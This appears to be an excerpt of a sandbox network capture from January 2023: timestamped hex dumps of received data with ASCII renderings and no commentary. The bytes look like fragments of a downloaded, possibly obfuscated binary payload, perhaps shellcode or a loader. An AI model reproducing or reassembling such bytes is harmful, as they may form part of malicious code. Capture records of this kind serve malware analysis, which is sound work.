                                                                                                                                                                                    2023-01-05 07:58:37 UTC13409INData Raw: 45 fe 2c 89 6e 34 54 ff a0 49 f1 e9 6c 00 73 00 11 44 3e ab 97 41 fc 11 02 3d f0 3c 01 d7 8b 83 4c 01 68 e9 3b 01 75 00 c9 c1 bd 02 80 d8 8d f2 d1 04 32 4d 01 c9 16 41 9f c5 fc 4d 9e 4b 34 02 75 ff b4 f5 8d eb 2c 06 32 66 23 0f c6 19 e8 d9 4b 41 fd 49 33 66 5e e9 3e 81 8d 06 72 00 32 40 e4 ed 72 d9 0e 41 7c b6 9d 66 70 89 2c 08 3e 0f 20 e8 14 bd 5b 75 8b db 78 0a 68 4c f8 06 3f 8b 67 08 13 0f d3 d1 ac 48 f3 c6 22 00 62 00 39 89 78 80 92 b8 a5 e1 70 8b 7f f9 37 80 9b 4c 8a 49 b3 c2 66 00 70 00 0e f7 b5 47 06 33 fa e9 39 4e 7c 00 91 f9 85 da f3 ca 61 e9 c3 97 7a 00 8c cd 9e 21 e4 01 75 49 fc 00 2d f7 b0 5d 1e 1c 06 c0 a1 7c 29 8a 3b 08 36 84 e5 66 34 81 88 4d 33 49 f3 e8 34 00 62 00 31 85 b2 48 a0 e0 3e 89 71 08 e9 41 f8 00 a4 e9 89 c1 eb d6 23 8b 7a 66 29
                                                                                                                                                                                    Data Ascii: E,n4TIlsD>A=<Lh;u2MAMK4u,2f#KAI3f^>r2@rA|fp,> [uxhL?gH"b9xp7LIfpG39N|az!uI-]|);6f4M3I4b1H>qA#zf)
                                                                                                                                                                                    2023-01-05 07:58:37 UTC13425INData Raw: f6 e9 35 00 75 00 82 41 ef 01 3a 85 c9 33 a5 f5 89 c1 a8 03 3b 81 89 3d 7b d0 69 2d 8d 09 6f 26 8b f7 ea f5 2f 85 bf 0f a0 05 04 63 76 07 71 f6 b1 0a 8f 66 20 3b b9 57 03 04 46 5f 38 63 a8 f8 32 3a b4 e9 52 44 67 00 36 8b 7e 41 f8 4a 36 49 e3 ea 76 00 68 00 15 81 89 4b 66 d3 96 4c 78 b7 be 45 f8 dd 54 41 d9 34 29 41 e1 5a 7b 9c 36 d3 d2 49 a6 cb 36 8f 66 66 33 81 f1 e5 22 66 34 3b aa 48 f2 ef 73 00 31 00 31 85 9f 44 ef 1f 8a 41 c4 c2 3a 45 43 d9 0e 41 f6 f9 36 f7 ea e9 90 b1 74 00 e5 f5 71 07 7c 55 8b 9a 3e 10 68 0f b9 e9 ec ae 3c 00 3c 8b 86 c1 b4 43 ea c0 ea 6e 2b 81 99 04 68 00 73 0f bf 66 71 0f c3 c6 36 89 55 66 85 d8 7a ff a2 48 f1 ed 6c 00 73 00 3f 81 c1 f1 1c 52 47 c0 b4 23 b2 e4 aa 8b 26 25 70 e9 38 f0 61 00 80 d6 f0 c6 76 f7 a1 e9 51 03 62 00 7a
                                                                                                                                                                                    Data Ascii: 5uA:3;={i-o&/cvqf ;WF_8c2:RDg6~AJ6IvhKfLxETA4)AZ{6I6ff3"f4;Hs11DA:ECA6tq|U>h<<Cn+hsfq6UfzHls?RG#&%p8avQbz
                                                                                                                                                                                    2023-01-05 07:58:37 UTC13441INData Raw: 8c ff 28 f6 b5 f3 3f 63 ce e9 58 fa 78 00 2c 03 82 e9 ec a0 69 00 5d fe 7a 38 5c 41 26 66 75 0f cb c9 46 04 40 41 a0 f1 c7 41 3b f9 16 45 53 f7 3b 81 8a 06 1a 77 1b 48 14 c0 2c 03 82 e9 dc 81 6b 00 3d 8b 61 66 37 0b a0 45 b4 c4 30 02 a6 48 e5 ef 76 00 32 00 27 0f 30 d7 2c 8b 64 45 44 d0 78 3b a6 66 80 c4 1f 6b 9b 1b df 04 62 41 8f c1 81 b4 83 04 77 66 74 89 24 08 81 d4 f8 0f cd c4 54 44 59 ff 31 8f 69 41 69 c3 3f 81 de 04 75 00 77 66 25 0b b2 44 08 c0 e9 07 34 3a a1 41 40 c0 82 2d ab 48 c9 4d 9e 70 c5 07 72 f7 e5 e9 b3 62 70 00 29 ff b0 57 33 31 2d 24 3c 81 8e 9f 1e 4e 7b f9 6d f9 2f 63 ab 4d 6b c3 9a 1e 7b 10 31 ff ba 66 32 85 b7 f9 27 0f 8d ef 22 86 9d 48 67 ba 86 b0 46 3c 15 48 82 d5 11 81 89 b1 64 5d 54 3d 59 3e 31 84 b3 48 10 ff 3f 03 ee e9 11 d2 7f
                                                                                                                                                                                    Data Ascii: (?cXx,i]z8\A&fuF@AA;ES;wH,k=af7E0Hv2'0,dEDx;fkbAwft$TDY1iAi?uwf%D4:A@-HMprbp)W31-$<N{m/cMk{1f2'"HgF<Hd]T=Y>1H?
                                                                                                                                                                                    2023-01-05 07:58:37 UTC13456INData Raw: 76 84 8b f9 43 c5 9f d8 a2 c8 9e 15 fb 06 75 4d fc 11 24 c0 8c fc cb c1 8c 85 39 8b 19 08 15 41 4c d3 c8 49 f4 c1 67 00 64 00 9b 27 d2 09 62 ff b3 d1 a3 e9 cc 2d 65 00 67 c3 5e c9 f6 fb 60 00 72 00 db 27 2f 02 70 31 54 24 7c bf 9a 48 3a e8 3d 0f c8 ee 39 f8 33 f6 f7 ea 97 48 13 ff 53 d7 15 44 f2 df 79 03 aa ff 94 5d 25 5c 33 c0 d5 80 6d 95 b0 5e 33 9d 15 b9 b6 21 6b 41 2d 98 3b 63 8f 66 ea 41 6f 66 fa 4d 13 fb 29 59 2b 4c 78 b7 e1 41 7a 96 b0 66 21 0f cc fa 73 5a 2b 63 8a 66 2d 0f c5 fe b1 c5 b3 41 2a 40 81 d7 3b 59 b1 c1 f0 03 23 85 b1 40 e8 fc cb 41 27 4c 3e 42 b3 41 f6 d0 95 35 7a 3d 03 14 46 41 28 48 0b d2 3b 03 85 ff d7 0f f0 51 59 00 64 5e 85 d0 7e 0f df c6 31 d2 a0 41 fa 03 3e 81 db 04 75 00 77 45 ef 02 36 33 f1 e9 80 4f 7c 00 29 84 b6 66 80 da d8
                                                                                                                                                                                    Data Ascii: vCuM$9ALIgd'b-eg^`r'/p1T$|H:=93HSDy]%\3m^3!kA-;cfAofM)Y+LxAzf!sZ+cf-A*@;Y#@A'L>BA5z=FA(H;QYd^~1A>uwE63O|)f
                                                                                                                                                                                    2023-01-05 07:58:37 UTC13472INData Raw: bc e9 10 5f 8d ff 73 81 9b 74 63 c4 3d f7 ab f5 80 c3 21 16 22 27 78 c8 2c 81 89 42 2a 74 7d 45 4a ca 9f d8 15 41 f6 fc f0 06 80 f9 20 31 60 24 a1 ff 73 81 99 1e 7f c2 5c 66 f2 c7 ad 42 6e 48 16 c0 32 3a bf e9 08 e4 31 00 2a 89 1e 08 21 0f cc ef 78 bf d9 9c fa 06 3e 81 8f 04 72 00 32 41 68 ed 30 0f fe c5 32 8b 5c f5 70 33 9f f9 3e 81 9a 12 09 66 03 81 8f b5 2d 84 29 d1 be f7 a2 66 74 3b 8f 81 b2 fd 6d 6a 3c 45 b6 ee 22 80 8e 76 29 52 42 2c 53 41 6b 48 16 ed 3f 03 99 e9 c7 71 35 00 23 ff 41 e9 97 48 7a 00 3e 8b e8 66 8a cf 3e 81 8d 02 72 00 32 40 a2 ef d2 0f d2 ff 93 44 78 ac fe 8c 13 41 fe 19 24 d2 bd 8b cc 48 e3 ed 74 00 68 00 32 12 8b 8b 4d 25 75 f5 8e 41 57 f8 9b 58 0f 08 62 4d fb 01 29 22 87 40 81 c6 fa 36 13 41 fc 30 24 c0 ad d4 54 41 6d bc 8b 49 e9
                                                                                                                                                                                    Data Ascii: _stc=!"'x,B*t}EJA 1`$s\fBnH2:1*!x>r2Ah02\p3>f-)ft;mj<E"v)RB,SAkH?q5#AHz>f>r2@DxA$Hth2M%uAWXbM)"@6A0$TAmI
                                                                                                                                                                                    2023-01-05 07:58:37 UTC13488INData Raw: 3f 81 dc 01 75 00 77 f8 02 ff b9 0f 84 7c 47 00 31 32 90 66 7c ba 84 70 71 d0 b2 66 33 0f cf f3 14 c1 c1 c4 22 80 b7 a0 42 d8 15 d3 b4 66 75 0f c6 eb 37 f6 bb 40 f2 f7 10 66 6d bc ad 40 e8 c7 f3 66 f0 db 75 32 b2 66 f6 cb c0 24 f6 ce 54 0f d4 1c 4c a8 31 49 f2 e9 75 00 31 00 9c 49 42 06 64 c1 bf 03 c5 d5 35 66 7f bd 93 41 59 ff 46 2c 15 5f 30 3b 8e 48 07 ed 8b 4c 31 c5 8b de 16 05 68 e9 59 c1 77 00 d8 0c cf 02 77 45 6b b6 78 49 b3 c2 63 00 70 00 0e d3 96 45 45 cb 57 d3 a0 66 33 0f c8 fd 52 41 c4 d9 23 80 b1 09 24 3b a1 41 f7 f1 b9 41 a5 c9 37 d2 a9 41 84 d1 77 32 bb f6 b4 c0 0e f7 ae 40 a5 cd 57 42 fe 2c 7b 49 e5 e8 70 00 32 00 04 41 f9 28 28 b5 31 48 14 ee 57 0f b8 41 fc 2a 2d 81 b0 04 32 00 62 41 43 eb e9 ed 59 57 37 29 71 3a 85 0f ba f8 e5 ed 65 0d 73
                                                                                                                                                                                    Data Ascii: ?uw|G12f|pqf3"Bfu7@fm@fu2f$TL1Iu1IBd5fAYF,_0;HL1hYwwEkxIcpEEWf3RA#$;AA7Aw2@WB,{Ip2A((1HWA*-2bACYW7)q:es
                                                                                                                                                                                    2023-01-05 07:58:37 UTC13504INData Raw: 8b 81 87 d7 25 93 2a f7 e6 f8 8c 81 98 04 53 6e 02 41 c4 c5 52 49 f1 fa 24 3d 30 10 80 d7 74 3a a5 f6 b2 88 8d cc b7 06 32 41 9d c3 99 67 54 ff 8c e9 9e 5b 3a 00 13 85 87 f5 25 81 9b 0c 46 94 4a 41 b1 c9 6a 41 8c c1 11 41 0a e8 8c 41 25 48 e1 c5 36 31 3e 24 23 d3 8a 45 42 d0 32 5a 32 84 e0 4d 16 c9 11 41 e1 f6 9b 6a 03 0e 62 49 fb 11 20 d3 9b 66 fc 32 3e c0 b1 48 b6 f8 69 49 f3 c1 34 00 62 00 16 c1 b0 73 b3 f0 65 66 75 0f d1 e8 78 66 25 89 43 49 3d bc a0 48 7f ba 90 5e 3a 81 9d 04 31 00 75 f9 36 8b 66 40 48 e1 c4 c7 fd 33 b5 e9 df bf 7f 00 8e 41 e0 c1 9c 29 27 0d 64 ff b2 e9 10 25 6e 00 8f ca a9 ca 70 57 46 14 15 5f 35 84 96 f5 2c 63 a0 f9 db f4 a0 11 70 e9 86 6a 7a 00 b6 ca 33 f9 82 da 9e a3 0a 11 72 81 c9 03 62 00 70 0f ed 17 4e 04 77 4c ba c0 9c 8d a8
                                                                                                                                                                                    Data Ascii: %*SnARI$=0t:2AgT[:%FJAjAAA%H61>$#EB2Z2MAjbI f2>HiI4bsefuxf%CI=H^:1u6f@H3A)'d%npWF_5,cpjz3rbpNwL
                                                                                                                                                                                    2023-01-05 07:58:37 UTC13520INData Raw: 7a c1 81 2c 39 81 82 06 73 00 77 41 33 c9 13 41 fe 4a 6c 9c 7d ab f1 f5 23 8f 72 44 67 b3 90 c0 84 b4 79 81 98 04 77 00 64 c0 ad b1 c5 d3 e9 5c 55 00 9d f8 40 df 3f 3b cd 81 9e ea 49 ac 3f f7 a1 f5 77 84 98 f7 ab e9 09 c4 73 00 9e e1 59 11 75 e9 cd 2b 6d 00 3f 8b 28 41 e9 72 78 d2 bd 80 a6 ef 3e 81 f3 0c 75 00 77 81 99 b8 13 a6 4e 80 8f 6c 16 44 67 ab ba 36 36 89 02 48 82 d1 11 0f cf c9 87 49 b3 e9 66 00 70 00 29 0f ce c8 9e 13 d4 0a 75 66 36 f7 a5 d6 16 f5 7e 03 ba e9 1e 2b 61 00 32 8b 75 49 0a fc 13 41 b6 eb 42 45 f9 5a 36 d2 85 0f e0 c3 ec e9 3a 81 9d 04 31 00 75 48 74 d9 02 44 49 e8 73 22 b9 41 73 c3 0e 0f b8 49 78 b7 eb 41 fc 42 7f 86 9b 66 7d be e9 49 6d bf ab 9c 0e 44 7c ab 9c 41 23 d8 34 8f 75 41 76 d8 33 2b ee e9 d7 0a 76 00 3f c3 9a f1 37 00 31
                                                                                                                                                                                    Data Ascii: z,9swA3AJl}#rDgywd\U@?;I?wsYu+m?(Arx>uwNlDg66HIfp)uf6~+a2uIABEZ6:1uHtDIs"AsIxABf}ImD|A#4uAv3+v?71
                                                                                                                                                                                    2023-01-05 07:58:37 UTC13536INData Raw: 25 53 2c 63 b2 40 b6 fd 04 f7 b4 44 6b e9 1c a1 72 00 57 0f c3 0e 37 d2 a1 40 f8 6e 30 66 a3 fa b8 2a 9a 48 f2 ee 71 00 31 00 f5 e2 bb f6 b5 d2 bc 40 c4 d5 22 22 bd 48 67 bf a3 86 a5 66 b8 4e 7d 48 78 b7 b0 66 7d ca ae 49 6d b7 a5 40 7a d7 fc 06 3e 81 da 04 75 00 77 48 6b b7 a7 86 c4 41 e9 13 31 33 ba f8 8a c1 b5 03 57 81 89 78 04 e9 7b 2c 7b 00 ca c1 ab 02 99 2e 5b 00 73 41 88 cb 70 81 86 01 1f cb 47 41 f3 c3 69 7e a0 1e 99 6a e4 04 73 56 b4 49 ba 02 30 0f b6 c9 02 45 71 cf 7b 81 a0 08 70 00 68 66 37 0f 35 cf 7d 8b bd e9 b0 e6 69 00 3a 8b 34 66 23 0f ca f1 eb 8a 3d 08 3f 85 ea 48 f4 ee 71 00 64 00 3a d3 d2 48 eb 46 78 4c 67 4d b9 45 78 b7 fd 9c 13 45 64 cf 25 d2 9b 8f 34 45 6d b3 a1 40 ec fc 3a 81 9c 04 31 00 75 45 fc 0b 21 33 b8 e9 a7 63 69 00 99 0e 26
                                                                                                                                                                                    Data Ascii: %S,c@DkrW7@n0f*Hq1@""HgfN}Hxf}Im@z>uwHkA13Wx{,{.[sApGAi~jsVI0Eq{phf75}i:4f#=?Hqd:HFxLgMExEd%4Em@:1uE!3ci&
                                                                                                                                                                                    2023-01-05 07:58:37 UTC13552INData Raw: 8c 1d c4 40 f5 ef ac f6 b1 f5 14 d3 db 40 94 d7 31 0a a7 40 f3 c7 9e 40 e1 c7 13 41 88 c3 29 0f 36 dd 72 fe a5 40 42 df e3 0c 4f 41 80 d3 75 32 ac 40 f7 fe 8a 48 f3 ee 36 00 62 00 16 41 ed ef 8b 44 78 b7 e9 89 7b 45 fc 1a 2d 81 b0 04 32 00 62 44 43 db 29 81 98 67 3d 13 5c 41 a4 c3 9e 59 77 04 72 8b 24 8b 24 04 86 d9 52 e2 b3 f9 ee 8a 7f 08 34 c0 96 68 02 41 a1 c9 7a 81 8c 02 70 00 68 41 a1 d1 33 12 f8 0f d0 c2 3b 0f d3 cf 33 0f aa c1 04 45 7f 4e a7 89 25 08 3b 0f 8e cb 13 44 78 b6 af 9c 33 fe f3 44 48 cc 31 fe a1 8f 75 45 78 bf fe 49 a6 d1 36 80 bd da 37 8b 38 f9 2b 81 b2 04 68 00 73 41 81 c4 b5 f5 31 33 bc e9 1c a2 8c ff b9 06 04 0f cd dd 2c 8b 35 04 36 84 c4 c0 be b9 3f 81 8a 04 72 00 32 f7 b2 41 87 d0 21 81 89 da 3b e9 33 41 56 c0 3f 0f 2f d9 fb 46 3a
                                                                                                                                                                                    Data Ascii: @@1@@A)6r@BOAu2@H6bADx{E-2bDC)g=\AYwr$$R4hAzphA3;3EN%;Dx3DH1uExI678+hsA13,56?r2A!;3AV?/F:
                                                                                                                                                                                    2023-01-05 07:58:37 UTC13568INData Raw: 95 7a 2b 7e 00 4a 33 09 d3 57 8e 99 03 67 98 ee bc 36 c7 77 3a 06 82 00 93 93 e5 9e 1a a3 a0 e9 a2 f2 ef 70 25 c2 ed 07 b9 0e 2a 81 b6 04 68 00 73 45 78 c0 ea 41 7a b7 b5 66 25 f7 a1 41 3d b6 60 49 f1 c2 69 00 73 00 45 c3 70 0f d1 db b0 49 6b a3 a9 34 c3 66 23 d3 83 49 e9 db 4a 1a 0d 53 c7 d8 3c c7 b4 08 47 33 27 41 3d 95 a1 fe b0 66 2d 0f c5 d9 11 44 1a de 39 85 ab 34 f8 45 7d c1 e9 44 6d b7 ab f9 44 78 85 d8 36 0f fa fe bd 66 36 bb d8 74 40 d8 bb 0c 66 4d 7f bf b3 41 b3 d3 69 45 ba 1a 9c a5 e8 ff 9b f7 ab ff f3 41 32 f9 16 45 67 a4 ab fd 46 0c 15 66 34 f7 a7 41 b6 d0 36 32 f2 41 3a 48 13 c9 24 03 aa e9 a5 70 3d 00 38 8b 66 36 2d 8b 70 66 73 81 90 83 72 41 bb c2 3a 89 76 41 e3 e2 13 41 cd fb 2b 41 a0 f2 7a 81 8f 04 70 00 68 66 32 d3 8d 66 70 0f cf e2 95
                                                                                                                                                                                    Data Ascii: z+~J3Wg6w:p%*hsExAzf%A=`IisEpIk4f#IJS<G3'A=f-D94E}DmDx6f6t@fMAiEA2EgFf4A62A:H$p=8f6-pfsrA:vAA+Azphf2fp
                                                                                                                                                                                    2023-01-05 07:58:37 UTC13584INData Raw: 48 0c 6a ad 9c 3c 67 da 3c a9 1c 44 e8 99 19 33 14 c8 01 aa 87 f8 50 dd 06 e5 ad 4d 9a d5 a9 3a 3f 84 e2 a3 ab b4 a3 d4 19 21 c2 4a d9 11 d5 3d 21 40 d6 a4 b4 70 ce d3 03 7d c4 5e d3 4d d2 29 6c 1c 8d b0 ea 2c c8 c7 43 b9 af 59 ca 89 ea 2e 72 d8 a5 b7 f5 e8 a7 c0 32 f5 08 50 e6 c5 05 27 5f 94 13 be 8b a4 16 c9 6e 31 63 57 fd 01 32 20 57 50 79 b9 cb 60 7d ce e9 4d 59 78 7d 7d 18 0f d6 2c 14 96 16 1c 03 e1 f7 89 6d 7f 62 b9 75 08 9a e8 7e 91 4a d8 68 e6 de c5 81 76 58 f5 c4 01 e8 a4 ce 98 61 94 8b ef c0 01 a9 71 47 31 ab 06 ab 60 b2 9f 7f 50 bf e8 89 5d a8 65 5d 6d ad 12 a1 3c b5 8b 32 0c e4 fc 81 99 c2 62 1d a9 c6 15 b8 f8 8d 8c 2c c8 cc fb ac d5 76 6b 6c e5 61 1c 94 b4 62 85 01 84 7a f2 e0 11 1c 6c 30 21 0a 1b 8f 70 55 82 09 40 10 f5 8e af 11 d8 07 9f 54
                                                                                                                                                                                    Data Ascii: Hj<g<D3PM:?!J=!@p}^M)l,CY.r2P'_n1cW2 WPy`}MYx}},mbu~JhvXaqG1`P]e]m<2b,vklabzl0!pU@T
                                                                                                                                                                                    2023-01-05 07:58:37 UTC13600INData Raw: a6 c0 91 e9 14 00 36 00 9d c2 87 d2 81 09 09 00 77 48 32 f2 9c f0 6c ff 9b ff b1 e9 e8 44 66 00 85 f9 a9 c2 71 f7 a5 f8 c4 c1 b7 02 82 f7 be 66 db bd 64 f7 b0 53 41 14 4c 48 a0 eb 8f 48 3e c1 ae 5b df 64 20 3a 8b 48 51 d2 9a 66 31 85 bc 48 70 ea 9e 20 e7 fd 8a e9 cc fa 64 00 3f 8b e3 48 a3 c1 9e 49 e9 e9 77 00 77 00 57 d3 94 45 fe 11 2c 81 9d 04 32 00 62 8b 7f f5 29 33 bb c1 be 03 c6 d1 35 80 8a 63 9d f8 f3 e9 63 1c 5f 35 b1 c9 6a 41 f7 c3 f6 e9 b7 15 75 74 36 50 25 0f e6 c0 73 81 aa 2d 11 01 61 31 7f 24 11 45 ba c1 34 58 3f 63 ad 49 85 c2 13 6f a9 52 88 e9 53 32 7a 00 88 e7 c9 48 76 d9 9e d1 c1 0b 72 49 b3 eb 63 00 70 00 2d 0f c5 0b 32 32 fb 49 7a c8 b1 c4 2b 66 33 8b f1 41 9c c1 ef 41 9e d1 15 41 88 c8 70 fe b4 45 45 c0 25 f6 ab 0f a2 c0 04 41 8f c8 29
                                                                                                                                                                                    Data Ascii: 6wH2lDfqfdSALHH>[d :HQf1Hp d?HIwwWE,2b)35cc_5jAut6P%s-a1$E4X?cIoRS2zHvrIcp-22Iz+f3AAApEE%A)
                                                                                                                                                                                    2023-01-05 07:58:37 UTC13616INData Raw: 78 a4 fe 58 44 1c 53 5f 25 f6 b0 86 db 07 98 02 70 ff a0 35 58 60 3a 0c ce c0 26 66 37 0f d2 df 36 0f 99 eb 53 04 54 48 bb fb 7c a3 ac 5b c7 c6 a2 48 14 c0 2c 03 82 e9 f6 f2 6c 00 8f cf 9d 45 f7 fa 37 3a cb f7 aa e9 b8 29 6a 00 85 d9 65 31 6e 24 7f ab af 40 7c 93 b0 5f c7 c2 e8 f5 3f 63 ad 4c 71 c1 db a6 b9 01 70 41 3b c3 7c 31 3f 81 df 08 75 00 77 a9 2d 15 59 41 76 22 a8 89 66 41 ba f9 15 41 78 bb d8 41 f5 e9 62 89 22 04 33 81 db 74 2d 65 7b 45 e3 0a 15 f7 b6 d3 5b 84 9b 49 f6 c2 60 00 72 00 76 33 a9 e9 8d 77 61 00 3e 63 b7 49 b0 fc 3a 62 4b 35 9c 66 f7 da 7b 03 8a e9 f4 35 60 00 8b 0f b9 f8 c8 c1 b3 02 80 de 25 80 89 1c b3 c6 b1 0f c9 64 9f de 26 48 a4 f5 3e cd 44 34 53 44 e1 ff 3e 0f 99 cd 3f 40 4a f8 90 48 10 f6 8e 40 c7 c6 67 48 74 de 8d 32 9f 07 32
                                                                                                                                                                                    Data Ascii: xXDS_%p5X`:&f76STH|[H,lE7:)je1n$@|_?cLqpA;|1?uw-YAv"fAAxAb"3t-e{E[I`rv3wa>cI:bK5f{5`%d&H>D4SD>?@JH@gHt22
                                                                                                                                                                                    2023-01-05 07:58:37 UTC13632INData Raw: f1 c2 60 00 73 00 3e 33 fa 48 66 f2 11 44 6b ac b4 13 3d bf 91 48 f1 e9 ce 7e dd 55 11 41 3e be 83 66 33 0f d7 f6 3a d1 fb 48 a5 c6 85 39 09 53 3b 81 9e 33 59 7e 0a 48 b6 c1 66 48 8d c9 db 23 ee 00 70 48 e9 fa 8b 47 5e 5d 70 81 b5 8e 44 bf 31 f8 f2 fd 2d 55 79 ee 16 d3 85 48 f2 e5 d6 39 52 33 31 31 73 24 e5 dd 94 25 05 7f 04 44 7f bb ad 40 8d c5 2a 4d 52 c0 3c 03 af e9 05 f2 8f ff cb 48 61 df 99 ec ac 0b 73 41 88 e3 c9 f7 ae e9 d1 c6 9b ff 7d cd db af 16 00 70 48 e3 2e 9a d6 9f 0d 31 55 44 14 53 5d 25 3a 90 e9 39 34 65 00 31 c1 a2 02 9a 56 b0 00 31 e9 e7 6b 70 00 37 48 7d 49 ef f6 b1 0f e2 c3 59 3c 57 f6 b1 2e 57 44 4e df 3f 0f de f3 38 5b 73 f6 a1 07 38 63 97 f7 b1 be 55 09 67 41 f5 f9 7b 48 67 f7 9b c1 f5 05 62 e9 4a 81 96 ff 3e 8b 7f 49 b0 c0 7d 00 77
                                                                                                                                                                                    Data Ascii: `s>3HfDk=H~UA>f3:H9S;3Y~HfH#pHG^]pD1-UyH9R311s$%D@*MR<HasA}pH.1UDS]%:94e1V1kp7H}IY<W.WDN?8[s8cUgA{HgbJ>I}w
                                                                                                                                                                                    2023-01-05 07:58:37 UTC13648INData Raw: 73 84 8d f9 5d 68 33 fe 13 57 36 2a c9 31 71 24 11 41 77 fa 32 fe f5 48 9d cf 2f 48 0b c0 15 41 80 c6 dc 45 39 03 b7 e9 f4 0d 7b 00 cd e5 04 45 fb 12 0e 41 40 c5 11 0f 9a e0 83 d4 3f 81 8b 04 72 00 32 8b 65 49 87 c3 68 74 a5 2e 36 33 f0 e9 7c 77 73 00 2d 8b 4b 66 3d be 91 49 f1 c1 60 00 73 00 37 f6 e7 66 34 0f bd 4c ef d7 14 f7 e4 e9 b0 c8 73 00 97 c9 b2 c1 74 40 c7 c6 7b 81 b6 3c 1d 82 76 f7 eb 81 8b 1d 5c ce 68 f8 b2 c1 74 f9 66 40 f5 cf 52 40 e4 e7 80 31 3e 24 3d 48 13 c9 29 80 88 18 8f 4c 32 c1 9c 32 6b 09 64 4d 71 c1 db ff 6b 0e 70 c3 97 e6 9a 7c f2 fe ce 66 fe 06 11 41 67 c9 14 8b 7c 02 26 0f c7 c7 20 81 9d 06 77 00 31 4c 7a bf b6 41 6b ac 8a 1d 54 44 6d 4d b4 66 9f d0 86 f9 11 41 b4 c5 13 f7 a6 66 47 c1 3f 0f 85 c7 2e 63 b1 66 e1 46 7b 66 32 0f 87
                                                                                                                                                                                    Data Ascii: s]h3W6*1q$Aw2H/HAE9{EA@?r2eIht.63|ws-Kf=I`s7f4Lst@{<v\htf@R@1>$=H)L22kdMqkp|fAg|& w1LzAkTDmMfAfG?.cfF{f2
                                                                                                                                                                                    2023-01-05 07:58:37 UTC13664INData Raw: 78 cb 8d 56 c2 fc cd 66 27 0f c6 0b 28 d2 8e f6 a3 41 bb 6b 77 0f b7 c0 02 40 7d b6 f7 66 6d ba 90 e0 21 81 98 06 77 00 31 0a 95 3d 3c 09 70 6f 33 f6 e3 05 2b 03 2c 78 20 81 bb 99 7a ba 34 40 83 d5 3f 0f de f0 bf 44 38 cd 6d bf b2 66 2d 89 38 08 11 41 3e 46 b2 98 eb 41 eb 03 3b 81 d8 04 62 00 70 44 67 ab a3 0f d4 f8 70 8b 77 33 b4 f7 bc 2d b8 60 8e 0e a3 c0 72 e9 87 59 8e ff 3e 8b 30 40 a7 f7 3e 8b 1d 08 33 8a 7b 10 9b 49 f1 c1 6a 00 73 00 3f 0f 94 f8 3c 89 36 08 f8 41 fd 01 7e 0f c9 d0 7f 9d ac c0 b3 6c 3e 81 db 04 75 00 77 98 25 8b 70 f8 54 f7 a7 8b 02 33 ad e9 c5 a0 8b ff ce c2 8c c1 b5 03 e5 f2 60 1b f2 01 8b c5 0c 01 68 49 f8 32 78 90 f0 41 ff 4a 7f 66 25 81 88 95 24 49 e3 ea 76 00 68 00 8a 48 a4 e6 d8 ce 1e 07 77 49 e5 e9 73 00 32 00 e3 e3 d0 1e b3
                                                                                                                                                                                    Data Ascii: xVf'(Akw@}fm!w1=<po3+,x z4@?D8mf-8A>FA;bpDgpw3-`rY>0@>3{Ijs?<6A~l>uw%pT3`hI2xAJf%$IvhHwIs2
                                                                                                                                                                                    2023-01-05 07:58:37 UTC13680INData Raw: 72 a5 01 48 16 c9 11 44 5f d0 3a 03 cb e9 59 cd 7b 00 0e 44 7c b6 71 8a 7f 02 ed d2 a7 66 6b a3 82 48 b3 ee 64 00 70 00 a8 e0 d2 41 a5 e0 a9 66 31 89 31 08 fb b0 0b 9c 54 c1 82 4b a2 fc e7 06 15 1d cb 41 a9 66 7a b3 87 41 ef 02 14 41 b7 c3 97 49 f1 c2 6c 00 73 00 f3 e0 57 81 8f 5f 6a 33 a7 e9 c7 4c 34 00 e3 f2 b8 08 09 4a 8b 66 33 85 de f9 f4 ea 88 13 39 20 b3 c2 30 f7 b8 40 f0 fe 3a 81 81 f8 4c 76 6f f9 82 d2 9e f7 2d 04 72 49 b9 01 9a 36 16 8b 78 66 a0 f7 37 3a d4 49 f4 c1 71 00 64 00 14 41 bb 11 97 44 f4 dd 20 81 9e 04 77 00 31 40 b5 e7 b1 e9 41 2d 7f 00 61 66 6d ab 93 41 67 bf ae c0 94 1f 00 3c 51 66 f6 f3 95 2e 3a 0f 88 e3 db 49 7f bc b7 5b 32 3a 89 48 52 ff 9c 0e 34 09 64 ff b5 f7 e5 d1 a5 55 16 81 8d c6 44 31 4b 24 71 c0 90 2d 37 c0 89 1b 2f f5 7a
                                                                                                                                                                                    Data Ascii: rHD_:Y{D|qfkHdpAf11TKAfzAAIlsW_j3L4Jf39 0@:Lvo-rI6xf7:IqdAD w1@A-afmAg<Qf.:I[2:HR4dUD1K$q-7/z
                                                                                                                                                                                    2023-01-05 07:58:37 UTC13696INData Raw: 20 f2 8e d8 b5 c2 96 af 66 df 2b 3f b6 ef 3d 48 09 be 62 d1 8f 8e 27 a6 26 1b 40 38 af 2b 05 4f 17 7a 4a d6 90 4a 48 a1 4b a5 5a 8c 9f 95 57 fb 26 c4 41 62 f2 f4 44 15 17 61 31 8b 84 51 60 fc 2e 00 2b 65 b2 30 2f 12 3c 2d d2 82 a8 1d 93 f5 03 4c 9f 6c c3 7c 88 1b 22 e9 e6 85 b7 d9 fe f2 4f 88 f5 6b 9f b8 e3 1c 6f b5 bd 91 e9 85 f8 e6 59 d4 f2 7f d0 e4 b7 08 71 71 95 96 f6 41 97 e1 1a 10 8e 78 ce 20 83 0f 5c 3d 23 9f 88 0d 26 e8 74 5c 3e 71 e7 6c 6f 06 54 f9 49 98 c8 c9 4d ef 6d 98 06 76 f9 a8 47 01 d5 85 24 b7 15 b5 33 c0 ed e4 30 59 78 d4 28 2e 99 41 4e b0 49 71 58 c7 f6 20 07 5e 70 10 42 29 eb 0d fe b9 62 3d bb ce da 6c f4 57 5d 5c f6 20 a8 c9 82 be 7c f9 8f c9 c5 a8 99 50 11 98 9c 27 a2 95 85 aa 31 a5 d4 dd 9b f4 9f 44 07 c4 9b 33 bb 51 bd ad 2f 61 fc
                                                                                                                                                                                    Data Ascii: f+?=Hb'&@8+OzJJHKZW&AbDa1Q`.+e0/<-Ll|"OkoYqqAx \=#&t\>qloTIMmvG$30Yx(.ANIqX ^pB)b=lW]\ |P'1D3Q/a
